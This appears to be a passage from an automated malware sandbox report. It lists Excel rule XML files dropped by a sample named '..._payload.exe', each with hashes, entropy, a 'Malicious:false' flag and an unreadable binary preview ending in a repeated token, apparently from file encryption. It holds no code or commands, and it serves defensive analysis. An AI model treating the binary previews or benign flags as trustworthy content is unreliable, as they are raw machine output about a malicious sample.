                                                                                                                                                                      Preview:<?xml.nJ$...`<...S.....:v........l..}S.o<5.....%.HTG,c..1..&/.z.;|R....N[.U.;..WJ/.c.U...k.....Q....x".},.l.e...xw...z.`T$...{B./0.y..... .8......T...]....k......3....A..F.......Bh'...-^>...!h.Y..b....c...H.C.5ot..u.h..?I.eu.../~..a.0Lv{..Z...........Ya.Y".....t....w..YM...7il..:p]9B.L...b&.dxH.a[>`....AU?.....m. 4..7.8.#.......Qr'dB.....i.2.U.........o6..:Z...M?..mmb<..pg.KbB....!i[$PWh[.rmn.,.b.1(.......AQ..6.!t.$.a..8?H..:..ZR.z..5O_.p..l.1=@. .9."/.a.U..H..VM.qoV.....{.F..g].K.%...fS.........Y...J....wMT.b......'p;.0>b....6......`...W F|...>.A4.5Yp...h.9CG..n .$....).J...a..F.pe.m]V......R..p(S. ..(5>+......t..c.;...e.}..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120662v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):803
                                                                                                                                                                      Entropy (8bit):7.695280877717955
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YabXoZMuwB1tDKjc3Nl0BV/JVhd/snjpjJb15EMOJHmWxbKBg+MN02KBoWSUdNcq:YAoTMOo3ULJndAjbJ56xbIg5e2KeV2bD
                                                                                                                                                                      MD5:139BAB0E0611561DE9D88F5094516869
                                                                                                                                                                      SHA1:57B5CDA1524903180F0ACFC57AD01790922F5BE5
                                                                                                                                                                      SHA-256:5898D5F0F47254CCAB6787F536FBF540F450E686493EF9E697A79210E641C0D9
                                                                                                                                                                      SHA-512:81EB66050B80BD9A3252592916BC6DEE5E51344BD3A3F6D2BA8963355CACC4DE21DDF5C1DDAA99B724310B772B8E595116189A5B6C023C4AB77487D80E04C636
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....rTmq.7.6....q'.FM:...z...9.S...PN........7.e....X0.6..1;|..6-.b...R*.pj.E....?.R...i..;.?......=^Z...^ ?.....<...Y....?$.K.kb.Ib....=..(....T..@[q.bId/...X.?....*..)ZK.gT.;..*....,..&...$..OC.....x|j..e....D........I.C.'..K.=.u...o.(0!.v..{.]j.:..s....u.Nl.|........-..`M..A..#.........K.'#Z..z0.T.....0.C...*...We.J..LQr9.=.Ta..r...|w.;...|w..Fc.k./C.U.......?..9.s..0E7xh.L....+=....'.[.]nY..r..._......%..q.g@4.(.:/q;.r*./s.?+..>..-u.........s.\......#F..#....>.+.+?.E~.^^P8R....z.|..{.ofk.F...g...a(.CH.9{...oF....../.....V...%..... .\..U.s.d..K..;.1.m....5|....u.....E.D.D.(..0...VS;;..4#?..q....%7._..@....C=.`.s9..;bG..T+....v.6v'U...t..:.`...5.. ?zI:......,......B..>mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120663v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                      Entropy (8bit):7.694955341053743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:l0Tb+eV/oziJvRbTpoZcahMNEuZX2IiVmbZhUZtdGK3rJNgZdwpMalCSUdNcii9a:uujZUXDigbZCZXGwHedwpJ2bD
                                                                                                                                                                      MD5:E18873C28950AE5F9AD021FF0D5F6E9B
                                                                                                                                                                      SHA1:8BD45BADCE0771BEF604F7E479F8940A1222AA2A
                                                                                                                                                                      SHA-256:9376E75CB1CB6E3C793F040E7C5ADEBC341F38F9D36CF59FBA82FDBF480F68C7
                                                                                                                                                                      SHA-512:E9FC1795F3AB247394CEB3908C7798E82D654C4BE6960BDAA82A05B0500763F89856E9041DD6B6CE5CB43D9CEBBDC73DCACE0103056845AD4837875FF92B7FE9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....y.M.<l......JcDE9...%...../.....7...T@.]F..)=/?...W.U..........Vo.b......G...B...y.....v.....y.J.aF.[+.w......ow..,.....b...O.nl.+k.}M..yZ.T......Q*..r...U.....tp...0........~F2|.....MU.....q....s..f....e..;Ud......PI.. .....P...z0....<.k.....U$.{.-.oky,Nk..l.7..*.~.i%..#..f{.....L1..d...N ...3.M9..0."S.;;.s%..2...1K.*O..o.N..hDz<..bF...y{.`3..&3...f>.7...W.S......0.i..BV.2..Q....c>..S.>..'!.T.5.b.`Yx\x.V....T...}.vw..tY{...i..t*..pd8."..I.GL.u..Bo.|.R..;#E....<...bD.Pk.H.....HU...c..Nv.A....@.m>.\..+[..............q....j..&..U.`.5..!.`.1...A.U......{...Uz..H,F\..).F/s.'A6{4[l.`?./*..a.yptB.Y*?....j..p...'....`..GE....G..R.H57_.I.t....JD.I..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240014v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):834
                                                                                                                                                                      Entropy (8bit):7.715035575669901
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:M4SYGgMiB1pqtExb/h9Q/hVjTqh5Gbp62bD:9SwMsprQnqh5GfD
                                                                                                                                                                      MD5:CD56E0175953BFE7765B47DBC96A708A
                                                                                                                                                                      SHA1:0CFCB7743353B0CEF387BF47FDA5CAD01558D556
                                                                                                                                                                      SHA-256:2155BBC9AF5D79D4987BEA9E9887128229E19124CF4062F307F1C9AB32172E01
                                                                                                                                                                      SHA-512:79156240FD330F8F953655826DF6DE1545FF341418B8DA314E68D5FD4A5744608A63A0EFD0EAF4BD00181BD324AD5E8E102CFA9AABDD7008D8EFEEE4C8E167B3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...C.5..E".[...gm.c.H.....{S...R....|.....G...z..!.c0.(.Q...x..T...W......'2..Z.....?...&.R.......D....H..Ve.#..eF.....k.v".xq.A..T.}p..J/.?..SKH.I.'..;\......~.|.}G.8..D.7..O..q..K0.....4....)..V5#).........'.N l..%..w........qRS....R...C.iSe..;....O....|.*/...:...s..;..#G..?..5+...Ds.1.C..7%#.n...?..`V..".0.T._..lt.:<.Ee.$.J....=M.F.(...0OV?:..H........y...(...0fYx.o.....kw2.5j.Z..8...`..>.^......]..d?P....x.ZT..P.&$:TQ+...T.K,.f._.|.r...5xK..>..."..WLO..[U......yn...E...?g...3{.....D]."........B.U.1....Pum...W...K.....s.`.....n..K^...6-..D@.+........K.....C....9...aNC.......f.m2~F....F.)|7....N.*0.=@1Hx...,L..!c..y....&?W. ..3........W..Fo.f.>-`....k~..JE..i.@.dRF.4.....U."..v..}.........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240015v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):759
                                                                                                                                                                      Entropy (8bit):7.693690435394027
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:h4MzSl2usYQeWG4DGBRzhdR5X2e/mvCGa2ZMXDgc3Mkm6mz1DXNO4WSUdNcii9a:+Rw2BF5hdR/mv8IMT/M1ZYO2bD
                                                                                                                                                                      MD5:8CDE9AB56F22EE9B5871A5D938962771
                                                                                                                                                                      SHA1:9932D1FFDDA3A585D86FCD2354C4C558A2782B52
                                                                                                                                                                      SHA-256:55D2BC29AE0D1F737DC06CF9FA35C75D3A610AE6093272F3CA37AD1CE4B431FA
                                                                                                                                                                      SHA-512:33B73E36A4579874E09A9B1CACE54FEB064B2C53E3F241D8218ECDCB0827D173720932389A18EE283500CE12C4AF3CA6BEA38BE0D4A13491C64FE8390A798966
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...Hz.. ..B..S.hW..<.............C...c.....u.y.....<L.-.V.-..L..@D...D......'Xyh.....{...SP.<.rM...K...h..Y.....-..=R.m|23........./..:.k..........,..../..(..*...$$......=.0.............H.u.>.R.5...8.}..F..U.cr!......."."............%;...}..R...mu.....t.^HY.....,....../.......<.....%..kk-KOp6.c.6....?..O..dh.m..G.~...M./....%.=..H|E.B...R.!...P..y..aR.i..}L."3~2.7..9.....VEw...`E...<}.<..Fe...|.'U.C.`Qt.....D..8....Zon$.m....m..5.....C...;.......<..+R.W.H.>....-?{Dx;x.>....Kb.n\.'`Y#.(1.~....7....{V|...g.Bc...ii..*s.......,.t.O%........z.^.....r,4.,1.._.....~%..R....*#. .x....P.CW....I....:/.m8.U.D..1%...k...V..&..^.4..V....[.F{.....%N..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240016v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):852
                                                                                                                                                                      Entropy (8bit):7.753985416577222
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RribDXCszYtBZ1EO5Un3DeIqbb3LhiCXGVL2bD:KzYvH55IqmuD
                                                                                                                                                                      MD5:9055DE8FE90BB0415B83FBE9567D1580
                                                                                                                                                                      SHA1:376A42F96C4F99CE95557E23913E10B60CF728CD
                                                                                                                                                                      SHA-256:F38013A729971AD8EBA7750B7A138E74430B2000D280486C673CD64913F5F8E1
                                                                                                                                                                      SHA-512:D78C5E5152F9A1991C5F06AD12A2952A095E1689A63159EFE71256BE5A9A947782C9EF5E27FC238E3558B2AEB98842E3B8B7BFE92D3441458F14D8CB2C6164F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....%d.#..C'F..7..._.B....T.5....w;...K.0....-X.+.......E|3....4..T.....?.li.....>q..[...uWn...-......Q....\._.mcSt.%.(..a^....p._l..h.S.`..:.........V*..|hl%5..g...$.E... ...."...j.j.^4.&.z......../..I`...5...-.N....A...._2.0.....)..:E.d.,...~.+.%.Z4..p..62...&a.c.E............b..^W.U..LD..^.0\....h.&(.....6.vR...0=7.wm..=.].a.~-...f.e@.....J<.Ou2..p........qvB..Q...H._..Dq ........;.....M2.........k...J....?..o...yk.^....x..7.[.....+.T.B...w^M...........k...y*.tt.d3.[..Q&.,.....g=Ni..'.....hD........M..c.;.&.'.....F.......$..A.Yk3.....M.+.:.......ZGj.p(w..pQ.i ...z.....7......R.....o.Ln...j(.3QT..}*2W?-......}..`.&'J.....a.M..^..}...K...... 9.s.)......a.3m.U9..43.....p..^.k.....B.?.$.*.v:..D.:....+2......(Nl.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240018v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):971
                                                                                                                                                                      Entropy (8bit):7.7631479841973565
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:jXANhCc8MjwwwmwsNQNGaLFfaatAW2xEEGww2bD:jQNwy3wcQTLFSaKW1EGUD
                                                                                                                                                                      MD5:5793A439ED0C2E9AC1C9822FE72F014E
                                                                                                                                                                      SHA1:D323C327D6310C990B97C038FEBFBA5B7E860628
                                                                                                                                                                      SHA-256:22CA7627CA409A6120A07A64F146CCE8F91B056E363795CDC886EA38B0A26985
                                                                                                                                                                      SHA-512:33DCAF3EE1BCEAFA22B7F1B7832E477AF61A7C6FBCB5651DB37559827F4CAABD428E74AE2758BB1463CD93E4E2277E95189E0FD33EB0C53BCDECBF0CC2CE4A65
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmld.XE...St.42..#.%...xy(.)..[.z.......t..o....~J.3)of.;...=.xF....M.Z.I.}:.7yk...ak-.C..@....t.<v..]`.U...a...7.3..>.ppP.a!.A+...!...W.;....Fg..S...4%?.D...`n..xP.H...."pXd.e....Z...!AKrd....`..iA.Slr....uFR....."}R\wU...!~.3.....*.i('&K;o.A.JJ....cA..".Jo..f...^.G../.7......z2...h.p...J..x.x..G.C."6t..A..0..[nM0..kdy..A.n....5.../...{. =.i.i.,...M..+79...,.R@.M....2..wE.F.....~P..{H...u.jD.w7....eS.....X.:....a.h.o.E......%\.i.??q.U;..*..3.........'?.5Iq..f.....a..l.ZYo...6.o.h.'o.3.F..Wi..r.Uk5.....?.d...+.u..=f5.$.1H....Rb.....d....g.Y[../.R.j...._..Dw.{i...U....,.....eU.p`...!e.n....B......)A.H.^.7...i....U$.sn6.][..9|.=K-...X.t.../..L....|..Z...|J`.6...|....*....5.... .....M....N..^]....6(.*.R...I5...d.....t...p...F.....9&.7B@`..:.O....1w..8c$...D.....S........xZ....^.......V.&..np...m...sY....]dT.....{.K/+.s@....#.l..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240020v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):941
                                                                                                                                                                      Entropy (8bit):7.791408155065775
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:50Mu/L9+f45F0BAn+YAQZzaOV5oheJQMD2bD:5Q/L9k45F4WYjOMheJQMwD
                                                                                                                                                                      MD5:3C842BE99DA810A71A79092C0FEC74B6
                                                                                                                                                                      SHA1:B1FA7A99BE52F838B1EAEE30597D1E5A72322BDD
                                                                                                                                                                      SHA-256:FD67F0ADA82CCBBF30626E9C8823E1D8AF50B140B7DA6BE4290200A00952F00E
                                                                                                                                                                      SHA-512:DB66E7BABA111D9A2950A616999CA5202F8B3C79962AB67FF9431B9818E30C059AACBC20B87551A714AC3EC6AD71A51E8A5756E695681642465D09D6EC584955
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml)YO#..`.b.t..d..S;......."....aW.g.x.|6.g.6A.o.H..."....... ].6.?X.cW.P.@..=E...#..l$.7$...N...s..!s.Dr..U0...L..f...Q...y>....X..[b..=.Z.,.0.E...Rgm9G...=p.?.4_....t+.3......ql3Z.l.y3...d;.r...L.@t...j..v.. ...&._.fv.7.r....\i..bN......&oP.No.,..#.../..&.<....0.M~]..K.\..*.p.9...2.#XD9.....0r.R.-VSV...x*a"....0..|..}AT..s...Z.4<....U..C..2...q...)......ZK...I.%.&..y...~.g...GQ..Ci..4.$.Z..Q.K.....hGe.......J._...........{.....$...]k..{Z..J.j`5.."<]..QI.....w..k?u...!.$....`...nj...d.`=...5.r.P...0.....T>..i@.T.P...%\.v.......<..U..-.1.Om............R..0.C..p.. ..&....../*.%....I...@..9.....&'..M&..J.jf.Q.hO..."i+{.#lU.A..1"b......w..e.-..pQ.D.V.?..GY..w.#...;s.b......-....y.g.=....../T...1..[....n.......Q..d[V...P. ...~%......2......f.{.....7..M......)_.$.S..._~.fr`..j.a\.....@!Y..U.V...A.~....{.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240021v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):945
                                                                                                                                                                      Entropy (8bit):7.78102078706301
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BjoTF7SzYuHDUpdFw/Y4lxlIGorj/re6vnybdASqmd2bD:BjAWfDUW/YOlmPDeKn+dteD
                                                                                                                                                                      MD5:177896B77DF64CE4EC7B0FB7C0901029
                                                                                                                                                                      SHA1:DEA57B2EA29E406C04CA83DD167899DF641184EC
                                                                                                                                                                      SHA-256:923DE254A3C2F47134BC41F6C37ED525C7C7CF883F54F1C2E1CED17CA26C4E3C
                                                                                                                                                                      SHA-512:A91CDE2FB693D1D46E5CA0107CE92773BA034FAEA2BBB393985211FD4E9DFEE12FB54A2154CA5B3523BDC17D3D07D6C1C18099A20E7FE60C0986E62A5E3D883A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlS....4K...W..\{_....J.Zn....m...i.\......o.'..1.?..%$..Ke..y.b >..hf. ...........m...(6.q... ...3t..e.?.........w.~E...1.][.smI..1o?)...&. ..`..Xi<..3.L6.6B..D.T....O......8..*a..b1.=.*k..Bj..._w.,NX...`.=Ds..7.........j..^.G...j..Y....R...X....v<...-}..1.?.x..?..V.b...<.1...D5..).+..s...b.G]9B3..5>.=..F..A...>.....Px.w...q..$7.c.Yx.k.....PD+Q..Q..I..........$..J.;.i...s8.vF...-P._=.W.^....U`e.!.....3.7.....y.M..3.h.Jw.....xmg..L...-y.m...w..} .\X..Y".4.K...#%..%.Gd..mZ...._..9Nj..t.c[P......\..4f.T..%...qs^x!.}.)Fg.o.....I..%.u.y..Z..|..JB>O.'....|.U#WM.d.@.M.B...@..{%v......d....... .}.)....R...+..L......;&..._....=...~rJ.#....)...!.U...?....2......Y.[..(.`7.]...y......In_p1..9..f...........R"t...S}..^.CN.E:....w.C......I.d........[..y..r.F..nB..Rq.{J.b.J.T.....x.M.:.=..... J....q.zU...?..ByW7...~...m....6...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240025v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1639
                                                                                                                                                                      Entropy (8bit):7.883498000987761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:VHpQpQgP7F9j3aYFC0nncU5CHijMian1fz3XrD:UPZbIibUijbapH
                                                                                                                                                                      MD5:E1B461AA4D92C3D21DADD0088294DD51
                                                                                                                                                                      SHA1:2F8F5DA43C8CC14184FADDB65EF4E68C1019AE2D
                                                                                                                                                                      SHA-256:B2D7991FF9689CA2B2D33B3F66D1F63A2F98D993B1C4EAB2E94FCE3E44779FED
                                                                                                                                                                      SHA-512:9BF1E2637E3ABCB153C3D46D3FF708EC189063E05C36703C57694049FD9C09285D120311CE31A2BA2F42D89C19FFE5E0490951B068A417D2E45B6C4C9BA34817
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml`.O<T. .._....e....s..T|.....oMTP..p,.S.4...)..W.S.....[03R.[\${X.._b..K.~..Z\>d....u..d\o1.q..._.sd....o..E.b,k0T[N..6...f....ss...}.Bb.Q.O...1.j..JlYWW...C.n.+w@..-&2|.^....%.-...<.VA....[......;..K.hrGN{}-...^5i>..\j.........?......;Q.I}P..<..q.!T.Aa.sS+...[...~1/].;l..w#{2..Ltf..;M.(.....e......k.ZDy.D..E...S.9%c.}B]..o.uo.q.}[.."......AP;{..M.c.%{.9p1.E\L.C..x........E.......1..=..1..*nM..BE[0...O.Q..v..f<jK..95.G.D......X.W..4..i.6..d.C..0..V1/...7f.u\.4(.[{.......W'.?k.6`#.0.@.r.\...........h.}...9.jG...x....s./u...7j[_.F^.H...:bt....H<.m...h.. QO1-J...h!v....o....r.W..q.U...w5m..xS..x...W..T`]k..".(.*?.k.4.{.{Vu@..##C..>..:.,)%....I........#.....>K.C..-T..Pd.7g|<.....7"}@....a%.8.....E....-A..\.+..?....v..o.UG....0<~.\..U...}..F.^I .KJ.#.s....Z....:..,...^T.....hCk.>.(.a......fm:fx...r.e.lE..P......0....>..."lB..~.....j.`.C..?..d..*d.R...~v*+...K,.....d.....>..89.d............*.g.#..^.>c.1...#Rt...{..(T.s........c..6$=ef

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240026v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7026
                                                                                                                                                                      Entropy (8bit):7.97315339731972
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:E1RF268IjC96oeHeZ03IZ1OgcQu1yA9Qj4o:0bKooe+Z0YZ1Og3uNuR
                                                                                                                                                                      MD5:BF4C4E8F6B7539FF471E99FA3718CD49
                                                                                                                                                                      SHA1:00166C8E39F4AF807D0A9BDCB554167545BA2E27
                                                                                                                                                                      SHA-256:81176EF8D6D9BA5265C695A4B8D124BD940FCB2499D6E4E44CB470793BD66C17
                                                                                                                                                                      SHA-512:AB1096603D82A47CC70505C72608A1919C54500358B056DFF2A62448170642AD51E3BF37D75E55D71262C0354F945F49D21223D85C094E39544C0D2CA4DEC1B1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlU{7^O....%.....0Q..../d......w(Jb.Ve.6.#\.h.N..u4.>..[...6.4.h....>.P..K....u..W.F.q.e}...S.h....qXE.&....R~y..[.N.,.......yJ.P.^..{.YLl.s<.|s.~bCM.......r.V..a.....v....^....>.....j...b[....K<.+o....[...H.....N@..q.5.....x...1>u......c3|..\N'.Ye.*P..DF.:N-....fy.p..s..Qy..o.-)....&........Z.>mc>.=y{...Y.JM..@......H..N...5.x...r...J..~..y.i-.1.9z..;6].IY{.*.d..j..p..kw.........Ng...B.BYx.l.]A.[.p......@....Hmjo..6.{h,C...."DP......>.....dH.v...U>..]9.!...*.Gl...8.n..0p....=.....<9!R.w.....iS,.k.T.k.W.EI4\..s...l.>..P~.N..+`.._....W^.........[.(^@......HT..............>. ..g.L...3....aC.ft......_@]........;..Z..L|37..\P)kJ....@....i..5H.q..............=....cV..O.N....rEV.`....c./?.9............Z.F.......T...D.t..(.]......W.O`.....X.^.%..8.O'.A.5.u..~.+..{.m..v.q}......&x.w...a......9Ma.9........u.%j*.X.31..i..a8.....P%..Yc.[....;....ZA.x.U..*$.R..iA...$|...Wd.?..".,.R.S....i _...M.../.o.U....E@.x/..}k..@z.....-......a..R^

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240029v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):845
                                                                                                                                                                      Entropy (8bit):7.737882782450853
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0J27IPNV7MN3Wb5/f/L8bZVcOSTHSCz1Xs8tXWLo2bD:0He5Wb5/78FmHPs8GfD
                                                                                                                                                                      MD5:391B4E07F36F154C9586034B378804E6
                                                                                                                                                                      SHA1:D0918D55DBECE0DD005A792FAA32989F5DAED452
                                                                                                                                                                      SHA-256:0820B7EE436DE97382D409FB251B689FB9CA917F37A560FC84C7BD876742F66A
                                                                                                                                                                      SHA-512:D43E6C60102656AAD198B454D8EE608198D54B3C4044BAACD716B4768DC9361231606DB8B0347B50FD429CC4927CECDDA13BAA25FBEECA65E6F6230B13C5145B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..NDf../.\..Gh.9.%..5.|.....qE.<(.....$..bBK.a..o.o...'..;...k.....*D..7...Z&....|...,9%S.[..#.......KGv}.1..w..N..M..>.....<[.0...`PO...J.O_.t..*.,.... .Z......s...U..).@m..5...Aj....6.tg.(..b..l.K.h....?..:pl..4.cl_m>n..a0.%.....JV.|e..%...+:...=N66$.K.3..K.|g.......]..^..X...U`........7..K..s... D.t..>>.\.)O0..O...S.~.E9...y7...Y.J.P..u.F...q...@{w..2..A.g.v..s.2y.l0........W.....g.r..6.G.m.^.....-bn-h.nml...e,,...n....9.f......}...a]h].|..#.|*&.5...6.m.m\......7$...P.Hq..;..@.2.%5.s..`..d&qZ.w.C4..f....:m.../Zq..2.R..]Ki....s..q...Nf....`......]2..44.ZZG.}s.1] .....*F.<.*.).=d...4i..\...!..JU^u..WnL.....`.U.M.3thVI)...y4.....>f....HC..9}...m...Fx...D.(G..hm...>.....E:.......N'.v......7iY..x!#...o..?..l..{......g..2%.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240030v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):946
                                                                                                                                                                      Entropy (8bit):7.785090086639027
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:OFgCM0ljdKcOPQr/8Vvd8/j0cvip72geH/FM2bD:O+Elkq/SK/da72g2fD
                                                                                                                                                                      MD5:589C98CC18B482F4E6DFBD37BC806BF2
                                                                                                                                                                      SHA1:D6291795CA790043FB4406DA51C8288AF9AA9ADF
                                                                                                                                                                      SHA-256:A076A190F9A8565C2AEE88DE0FDC24DD5DC42DD69C33010FBAE409CCD6319253
                                                                                                                                                                      SHA-512:F174813CE2BD84308E547DA863284C74482DF0B86EA98DB373520E16B2AED4362309ADA9AA866BC54C85EC44BDFB190A77281CBB92D872E12AA3004756A71B04
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........)...kT0.*.B..?0..`[...\.<...j2....3.v....|}R...w.......T.5N8...~.}........ .:...R.;.B...Z....f.....K...G..+.7....{..z.)xc.Ay..F..6.3..r.._N..@.........'...D..6y]7|..2...lQ..Y..z.$.xP....L.........{"....6O.o#.k.R...4..J.(......=..o!t...M..3...?.YI'C..E?~l<I}}..&r8.....:a_..p...*B.X;&...@.<....7..H1..t)..8.G........{. P../. $...:.%...e&..T..5.......v>.<..rb.R..;c.....v.....x..a.*.!..M..j......T...'n......Y.h@-Q9qiy..<.q..-S.{..(....)6.-.S%...........&LP...*j...t.<....W...]830y....jb.........e.d...j.@..,....qQ..CF......<..g.....Y.i=....UG.fX......$.r.mB.MN=.F..-U....'...v;{.B.n.....=..m.<..i..Z.r..c......@..1..R....&..Y...l.7..A...N..32.pt..t.%/.....q.wb.../.9...,.H2.8DA9.K]Z.H.aA...d.|..c..........B[&.,E..D..k...wG)i........[.$X.|*.z:..{.).4. Y-i........S.6.:C.|..~..._...mkw]R@.u.....5...L.......[.v....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240031v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):842
                                                                                                                                                                      Entropy (8bit):7.716470093920134
                                                                                                                                                                      Encrypted:false
